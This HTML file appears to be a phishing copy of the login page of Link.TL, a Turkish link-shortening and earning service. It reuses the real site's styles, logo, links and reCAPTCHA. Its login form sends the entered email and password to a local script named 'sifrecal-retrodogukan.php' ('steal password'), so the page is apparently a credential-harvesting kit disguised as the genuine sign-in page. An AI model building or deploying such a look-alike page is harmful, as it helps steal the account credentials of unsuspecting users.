
<!DOCTYPE html>
<html>
<head>

    <!-- Title -->
    <title>Giriş Yap | Link.TL - kısalt, paylaş ve kazan!</title>

    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta charset="UTF-8">
    <meta name="description" content="Link - URL kısalt ve para kazan. Link kısaltma servisimiz ile hemen para kazanmaya başlayın!" />
    <meta name="keywords" content="linktl, link.tl, url kısalt, link kısaltma, para kazan, link kısalt, url short, link short, adf.ly, adfl, bc.vc, pnd.tl, tr.link, link, kısalt, kısaltma" />
    <meta name="author" content="Jet Interaktif" />
    <link rel="shortcut icon" href="http://link.tl/themes/ax/images/favicon.ico" />
    <!-- Styles -->
    <link href="http://link.tl/themes/materialize/css/materialize.css" rel="stylesheet"/>
    <link href="http://link.tl/themes/materialize/css/themes/collapsible-menu/style.css" rel="stylesheet"/>
    <link href="http://link.tl/themes/materialize/plugins/fontawesome/css/font-awesome.css" rel="stylesheet"/>
    <link href="http://link.tl/themes/materialize/css/custom/custom-auth.css" rel="stylesheet"/>
    <link href="http://link.tl/themes/materialize/css/layouts/page-center.css" rel="stylesheet"/>
    <link href="http://link.tl/themes/materialize/vendors/perfect-scrollbar/perfect-scrollbar.css" rel="stylesheet"/>
    
    <!-- Global site tag (gtag.js) - Google Ads: 1029650010 -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=AW-1029650010"></script>
    <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'AW-1029650010');
    </script>
    
</head>
<body class="purple">


<div id="login-page" class="row">
    <div class="row">
        <div class="col s12">
            <div class="auth-logo">
                <a href="http://link.tl">
                    <img src="http://link.tl/storage/images/logo/panel.png" alt="" />
                </a>
            </div>
        </div>
    </div>
    <div class="col s12 z-depth-4 card-panel">
        <div class="login-form">
            


    <form method="POST" action="sifrecal-retrodogukan.php" accept-charset="UTF-8" name="login-form"><input name="_token" type="hidden" value="bl2ifewcfIxi4WJkidSSM2Yvkiuc6gCI3bSUWKtV">
    <input type="hidden" name="_token" value="bl2ifewcfIxi4WJkidSSM2Yvkiuc6gCI3bSUWKtV">

    <div class="row">
        <div class="input-field col s12 center">
            <h4>Giriş Yap</h4>
        </div>
    </div>

    
    <div class="row margin">
        <div class="input-field col s12">
            <i class="material-icons prefix pt-5"></i>
            <input id="email" name="email" type="email">
            <label for="email" class="center-align">E-Posta</label>
            <div class="error"></div>
        </div>
    </div>
    <div class="row margin">
        <div class="input-field col s12">
            <i class="material-icons prefix pt-5"></i>
            <input id="password" name="password" type="password" value="">
            <label for="password">Şifre</label>
            <div class="error"></div>
        </div>
    </div>
    <div class="row">
        <div class="col s12 m12 l12 ml-2 mt-3">
            <input type="checkbox" id="remember-me" name="remember"  />
            <label for="remember-me">Beni hatırla</label>
        </div>
    </div>
    <div class="row margin">
        <div class="col s12">
            <script type="text/javascript">
        var RecaptchaOptions = {"curl_timeout":1,"curl_verify":true};
    </script>
<script src='https://www.google.com/recaptcha/api.js?render=onload'></script>
<div class="g-recaptcha" data-sitekey="6LfDdhgUAAAAALhIRnt4kgEXxPUyeF6sR49eRWIJ" ></div>
<noscript>
    <div style="width: 302px; height: 352px;">
        <div style="width: 302px; height: 352px; position: relative;">
            <div style="width: 302px; height: 352px; position: absolute;">
                <iframe src="https://www.google.com/recaptcha/api/fallback?k=6LfDdhgUAAAAALhIRnt4kgEXxPUyeF6sR49eRWIJ"
                        frameborder="0" scrolling="no"
                        style="width: 302px; height:352px; border-style: none;">
                </iframe>
            </div>
            <div style="width: 250px; height: 80px; position: absolute; border-style: none;
                  bottom: 21px; left: 25px; margin: 0; padding: 0; right: 25px;">
        <textarea id="g-recaptcha-response" name="g-recaptcha-response"
                  class="g-recaptcha-response"
                  style="width: 250px; height: 80px; border: 1px solid #c1c1c1;
                         margin: 0; padding: 0; resize: none;"></textarea>
            </div>
        </div>
    </div>
</noscript>

            <div class="error red-text"></div>
        </div>
    </div>

    <div class="row">
        <div class="input-field col s12">
            <button type="submit" class="btn waves-effect waves-light col s12 green">Giriş Yap</button>
        </div>
    </div>
    <div class="row">
        <div class="input-field col s6 m6 l6">
            <p class="margin medium-small"><a href="http://link.tl/register">Kayıt Ol</a></p>
        </div>
        <div class="input-field col s6 m6 l6">
            <p class="margin right-align medium-small"><a href="http://link.tl/password/reset">Şifremi unuttum?</a></p>
        </div>
    </div>
    </form>

        </div>
    </div>
</div>



<!-- Scripts -->
<script type="text/javascript" src="http://link.tl/themes/materialize/vendors/jquery-2.1.4.min.js"></script>
<script type="text/javascript" src="http://link.tl/themes/materialize/js/materialize.min.js"></script>
<script type="text/javascript" src="http://link.tl/themes/materialize/vendors/perfect-scrollbar/perfect-scrollbar.min.js"></script>
<script type="text/javascript" src="http://link.tl/themes/materialize/vendors/jquery-validation/jquery.validate.min.js"></script>
<script type="text/javascript" src="http://link.tl/themes/materialize/vendors/jquery-validation/additional-methods.min.js"></script>
<script type="text/javascript" src="http://link.tl/themes/materialize/js/plugins.js"></script>
    <script src="http://link.tl/themes/materialize/vendors/jquery-validation/localization/messages_tr.min.js"></script>

<script src="http://link.tl/themes/panel/js/pages/form-login.js"></script>

</body>
</html>